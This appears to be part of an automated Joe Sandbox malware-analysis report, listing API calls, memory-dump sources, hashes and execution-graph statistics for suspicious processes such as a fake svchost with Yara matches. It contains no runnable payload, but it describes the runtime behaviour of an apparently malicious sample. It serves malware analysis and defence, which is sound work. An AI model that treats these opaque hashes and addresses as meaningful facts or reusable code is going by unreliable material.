                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: e76a990ad7823ac8d5fea4256fe0a354a67385d9aeb23aa01fd0ed9021df75f2
                                        • Instruction ID: 246170436ead5d8511690fadd615a4a3d43d7dbf7d95c1726b1802b167a3b3fb
                                        • Opcode Fuzzy Hash: e76a990ad7823ac8d5fea4256fe0a354a67385d9aeb23aa01fd0ed9021df75f2
                                        • Instruction Fuzzy Hash: E1510C71A04209EFCF14CFA8DC45AEEBBF8EF4A300F14465AE555E7291D7349941CBA0

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a3216; graph node data omitted
                                        APIs
                                          • Part of subcall function 007A31DA: _free.LIBCMT ref: 007A3203
                                        • _free.LIBCMT ref: 007A3264
                                          • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                          • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                        • _free.LIBCMT ref: 007A326F
                                        • _free.LIBCMT ref: 007A327A
                                        • _free.LIBCMT ref: 007A32CE
                                        • _free.LIBCMT ref: 007A32D9
                                        • _free.LIBCMT ref: 007A32E4
                                        • _free.LIBCMT ref: 007A32EF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                        • Instruction ID: f241df92469c81de2a73d508306c3f53f1f49a5bc3f5d03d825d4e06cbeca43e
                                        • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                        • Instruction Fuzzy Hash: 64111F72A41B08EAD530FFB0CC0BFCB779C6F87740F404A15BAAE66052DA69B6058650

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a44e9; graph node data omitted
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,007A473A,?,?,00000000), ref: 007A4543
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,007A473A,?,?,00000000,?,?,?), ref: 007A45C9
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007A46C3
                                        • __freea.LIBCMT ref: 007A46D0
                                          • Part of subcall function 007A32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007A332C
                                        • __freea.LIBCMT ref: 007A46D9
                                        • __freea.LIBCMT ref: 007A46FE
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: fa38ebf12fddf842cef18dfa69dbe65d7a03b299fbd49f59af8a837b2f8fb1a0
                                        • Instruction ID: 9bbac4fd9baa20206e2fedbf3e66ac50e8c9c7eec56367dccf92f5c3ee01465a
                                        • Opcode Fuzzy Hash: fa38ebf12fddf842cef18dfa69dbe65d7a03b299fbd49f59af8a837b2f8fb1a0
                                        • Instruction Fuzzy Hash: C351BF72600216ABDF259E64CC45EBB77A9EBC7750F194728F804D7190EBBEDCA0C650

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a185b; graph node data omitted
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 4467cafea4201b5eecfbd479b49a99fa8087c0e4d35d87314b864dfcb99e9eb5
                                        • Instruction ID: 132939262292cc493eddd3b4fdff1972cf8e4ef41808dbfbc9b38fb64f2c98da
                                        • Opcode Fuzzy Hash: 4467cafea4201b5eecfbd479b49a99fa8087c0e4d35d87314b864dfcb99e9eb5
                                        • Instruction Fuzzy Hash: A0F0A432104601AAE2522739AC0EF2B165A9BC3771FA58338F915A2292FF6D8C43C255

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a3fc2; graph node data omitted
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007A3F73,00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002), ref: 007A3FE2
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007A3FF5
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,007A3F73,00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000), ref: 007A4018
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 34465fac112fdbee1812e5c963038116edc021c89f6f7f3526255f9f2b1b5dbf
                                        • Instruction ID: 9944c6c05588f38158551297475411c90f676ab8b8098a6c35d4fd70bafb08e8
                                        • Opcode Fuzzy Hash: 34465fac112fdbee1812e5c963038116edc021c89f6f7f3526255f9f2b1b5dbf
                                        • Instruction Fuzzy Hash: 12F0C230A0021CBBCB549F94DC09BAEBFB5EFC5711F0081A8F805A2150DBBD8E40DB95

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a18df; graph node data omitted
                                        APIs
                                        • GetLastError.KERNEL32(00000008,?,?,007A15D8,007A3CBB,?,007A1D2A,?,?,00000000), ref: 007A18E4
                                        • _free.LIBCMT ref: 007A1919
                                        • _free.LIBCMT ref: 007A1940
                                        • SetLastError.KERNEL32(00000000,?,007A1D2A,?,?,00000000), ref: 007A194D
                                        • SetLastError.KERNEL32(00000000,?,007A1D2A,?,?,00000000), ref: 007A1956
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 1e8fe56cc9b788ed1329013809c06cd1cb6710cfe1d41e9d046fb15c8df3e896
                                        • Instruction ID: fc912974f1a3a3e7d7c9a20720a8ff23ef341c18a4d9ba4f2d03a9d596c4fd9c
                                        • Opcode Fuzzy Hash: 1e8fe56cc9b788ed1329013809c06cd1cb6710cfe1d41e9d046fb15c8df3e896
                                        • Instruction Fuzzy Hash: F2012632100201BBB21226386C99F3B121D9BC3374F614328F510A2193FB2E9807C110

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a3171; graph node data omitted
                                        APIs
                                        • _free.LIBCMT ref: 007A3189
                                          • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                          • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                        • _free.LIBCMT ref: 007A319B
                                        • _free.LIBCMT ref: 007A31AD
                                        • _free.LIBCMT ref: 007A31BF
                                        • _free.LIBCMT ref: 007A31D1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ccf1dd2158c66a5d2a997f8843cd61abf4f49f900c7e2c40872721f126a38d71
                                        • Instruction ID: a87e4c1d5cc298d7e0840a416210c5a83eee00a6fb7cfd957cf3b1fe58773bda
                                        • Opcode Fuzzy Hash: ccf1dd2158c66a5d2a997f8843cd61abf4f49f900c7e2c40872721f126a38d71
                                        • Instruction Fuzzy Hash: FAF01D32605604EB8634EF68F98AC1B73D9BA867117644A09F559D7602CB3CFD818AE8

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a34ff; graph node data omitted
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 007A354C
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007A35D5
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007A35E7
                                        • __freea.LIBCMT ref: 007A35F0
                                          • Part of subcall function 007A32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007A332C
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 27b8bb10f343ce2c5c399f6cd4f947e4f460091fe088fe9845769d2b11f124eb
                                        • Instruction ID: ff4988103d8ad57797b211998575d941bb9f68003de54c6004200b0b406edc43
                                        • Opcode Fuzzy Hash: 27b8bb10f343ce2c5c399f6cd4f947e4f460091fe088fe9845769d2b11f124eb
                                        • Instruction Fuzzy Hash: 77318E72A0021AABDF259F78DC45DAE7BA5EF82310F154229FC04D7250EB39CE64CB90

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a218b; graph node data omitted
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007A15D8,00000000,00000000,?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue), ref: 007A21BD
                                        • GetLastError.KERNEL32(?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue,007B6FC4,FlsSetValue,00000000,00000364,?,007A192D), ref: 007A21C9
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue,007B6FC4,FlsSetValue,00000000), ref: 007A21D7
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: c1d02e5c0fe98fec8141f66a9459605ccf4c60eaff9844b3e125b88fc5616d74
                                        • Instruction ID: 945c0da3d4dbf269d5b32b7e312c412d66a7950c862047a5352fe2c288e7835c
                                        • Opcode Fuzzy Hash: c1d02e5c0fe98fec8141f66a9459605ccf4c60eaff9844b3e125b88fc5616d74
                                        • Instruction Fuzzy Hash: CA01FC3270122ABBC7214A6CDC44E667B98AFC7B60B214724FA15D3141C72CDD02C7F4

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a2ddb; graph node data omitted
                                        APIs
                                          • Part of subcall function 007A29AE: GetOEMCP.KERNEL32 ref: 007A29D9
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007A2C7C,?,00000000), ref: 007A2E4F
                                        • GetCPInfo.KERNEL32(00000000,|,z,?,?,?,007A2C7C,?,00000000), ref: 007A2E62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID: |,z
                                        • API String ID: 546120528-726383530
                                        • Opcode ID: ef0ac1c2610f3b93478387e2bdcced8b0d740e0c77870daa4cbc4dfa6c7431c3
                                        • Instruction ID: c92b4f024f3794bd2a1cac6a1eb3120a7f9ff3306fdc9d38b9ea3debc1c7efdd
                                        • Opcode Fuzzy Hash: ef0ac1c2610f3b93478387e2bdcced8b0d740e0c77870daa4cbc4dfa6c7431c3
                                        • Instruction Fuzzy Hash: A95116709082459EDB248F29C848ABBBBF5EFC3304F14866ED4969B153D73D9943CB90
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007A4CAE
                                        • ___raise_securityfailure.LIBCMT ref: 007A4D95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: 0|
                                        • API String ID: 3761405300-1398520540
                                        • Opcode ID: 774ac7040ec613a54befba42bbca062f37d2b5ac2ea42f2b2fd4caabd56eda0a
                                        • Instruction ID: ebf407053683afc27d7a3403914fc5e4d6e1bab4b6e9e21b7b0ce35f74fa8f4a
                                        • Opcode Fuzzy Hash: 774ac7040ec613a54befba42bbca062f37d2b5ac2ea42f2b2fd4caabd56eda0a
                                        • Instruction Fuzzy Hash: 2C2103B5512704DAE314CF19F985F587BA4BB88310F10D12EE9099ABA1E3BC9581CFC8

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:97.6%
                                        Signature Coverage:0%
                                        Total number of Nodes:84
                                        Total number of Limit Nodes:1

                                        Control-flow Graph

                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 007753C4
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 438367610b265784832eb1699b21556bac4a8ed501bebfe1629a3bd6498bcd6d
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 3A41C69290DED58FDF26432448643747BA0AB123EAF9DC5D7D48E8A1F3E2DC4C819366

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction ID: b81fbf0162481c37914a2e92780dc6f138ac3f276c99c6488a729bcfabba38e4
                                        • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction Fuzzy Hash: 26D10532568B0D8FCF28EF58E8457EAB7D1FBA1310F58461FD846C3164DA78DA4586C2

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction ID: 868848a603a974ac8c2cf300ec37cb7e3d3aea5409d68944cf386689f9477c79
                                        • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction Fuzzy Hash: 7961D03168CA499FCFE59B28C85C2396AA0FB553E0F98C65AE44EC21A1DF2C8C45D753

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: 041df2fddea4ff37a948505663f5ae364304f4ce199b6e7b125e9201dac9ec11
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: DB01D27070DF478FEF6657248C583797790EB113E4F2481AB888FCA0A1EAEC4901A762

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: 696bf6fa78e42799052a6a666ace71fe9afd22cae606ea70dd819529e7d7a1ba
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 70F16A2175CE488FDF69A72C68452B977D2F799310F5882AEE14EC3296DD2C9C06C7C2

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: daedfd8ffd6f0001a11657f1efebbff7991eb42bedfff814438422c2c0da36cc
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 9B21B23060CF46CFDF6B9728849877426E1EB543D0F68C6A6944FCF1A2DAEC8C449361

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 1860bacf43d0ae6ea18c936bc404356d4fedca574eb519debb573d58180ebc64
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: EDE0867061DF444FDF5A9B2458203293AE5EB89350F1541DEC44EDB1E1CBAD19064796

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: ce150c07d7f975eb1e647db8552b2f1561ac9b98b37983949734adf1aa94f95b
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 3C01D660A1DF80CFDE56971844492797952FBD53E4F28C5AAA24EC7092DDECAD009F82

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: b151efd4fa3d2ebc0929364efa80425cfb4345450514a73bf54e8e4de2ce02e2
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: 55E01271758E1BCFEF66A718CE9977526C097243E1324C961880EC7120E9DCCE456722

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 86b1e28fe3aae3ea72fcea5d66a1d146968815de766d7bab0d49a6e3fed87baf
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 19C08C619E990E9A5FF9028CCC2F0F0260082023F0BCCC82E8C0EC0220DD0C8E03809B

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: 6b0c900c96fa80821ac8bb87e4b52a41fcab0e52ad527b28bca587c15d0a988d
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 26C048A59D961D865AB9268CEC1E0A1255046127F0B88C82AAC0E8A261D95C8D4285A3

                                        Execution Graph

                                        Execution Coverage:0.9%
                                        Dynamic/Decrypted Code Coverage:6.6%
                                        Signature Coverage:11%
                                        Total number of Nodes:91
                                        Total number of Limit Nodes:7

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 43 417b23-417b3f 44 417b47-417b4c 43->44 45 417b42 call 42f733 43->45 46 417b52-417b60 call 42fd33 44->46 47 417b4e-417b51 44->47 45->44 50 417b70-417b81 call 42e1d3 46->50 51 417b62-417b6d call 42ffd3 46->51 56 417b83-417b97 LdrLoadDll 50->56 57 417b9a-417b9d 50->57 51->50 56->57
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B95
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 2df5ad1a77759440835b44e0c81d592d2dcef492499a061f42018885d7945096
                                        • Instruction ID: da5e64ab01b131cc96b5ec7ff34648e32b4ad6f3ea518197a63e5e5984a29078
                                        • Opcode Fuzzy Hash: 2df5ad1a77759440835b44e0c81d592d2dcef492499a061f42018885d7945096
                                        • Instruction Fuzzy Hash: 8D015EB5E0420DABDF10DBA1DC42FDEB3789B54308F4041BAE90897241F634EB588B95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 63 42ca93-42cacc call 404a33 call 42dce3 NtClose
                                        APIs
                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAC7
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: cf2b45a22dd28b00f8020047974d71a9615bfe0208659e68875304388e63bb0d
                                        • Instruction ID: 57ebef8ecfe624d0edae23a3c2bbfaab208ae6cfe1b98be8ccd3da2e80d7a6fc
                                        • Opcode Fuzzy Hash: cf2b45a22dd28b00f8020047974d71a9615bfe0208659e68875304388e63bb0d
                                        • Instruction Fuzzy Hash: D3E04F717406157BD510EA5ADC41FA7775CDFC5715F004029FA18A7241C77079008BA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 35735c0-35735cc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d3c647256941c7591f67b9c1b33ef351aa0f8012d3bb8240517a09a8a4625660
                                        • Instruction ID: 635ff0fb3b3614e60f566736777f56efcbdcc4d2a4cdcdff574c233184230ac5
                                        • Opcode Fuzzy Hash: d3c647256941c7591f67b9c1b33ef351aa0f8012d3bb8240517a09a8a4625660
                                        • Instruction Fuzzy Hash: 7D90023170550802D100B25855547461046D7D0311FA9C411A442556DD87958A5165A2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 77 3572b60-3572b6c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                        • Instruction ID: 457c78abb18feeb14149725498e1d226c4b2eaf328586fb1b4f1f17e32bb03f2
                                        • Opcode Fuzzy Hash: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                        • Instruction Fuzzy Hash: DA900261302404034105B2585454656404BD7E0311B99C021E5015595DC62589916125

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 78 3572df0-3572dfc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                        • Instruction ID: 26917ed0f73f38a4eace80e7b34893c04d04172b55752e347161c2f58b8eb265
                                        • Opcode Fuzzy Hash: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                        • Instruction Fuzzy Hash: 9E90023130140813D111B2585544747004AD7D0351FD9C412A442555DD97568A52A121

                                        Control-flow Graph
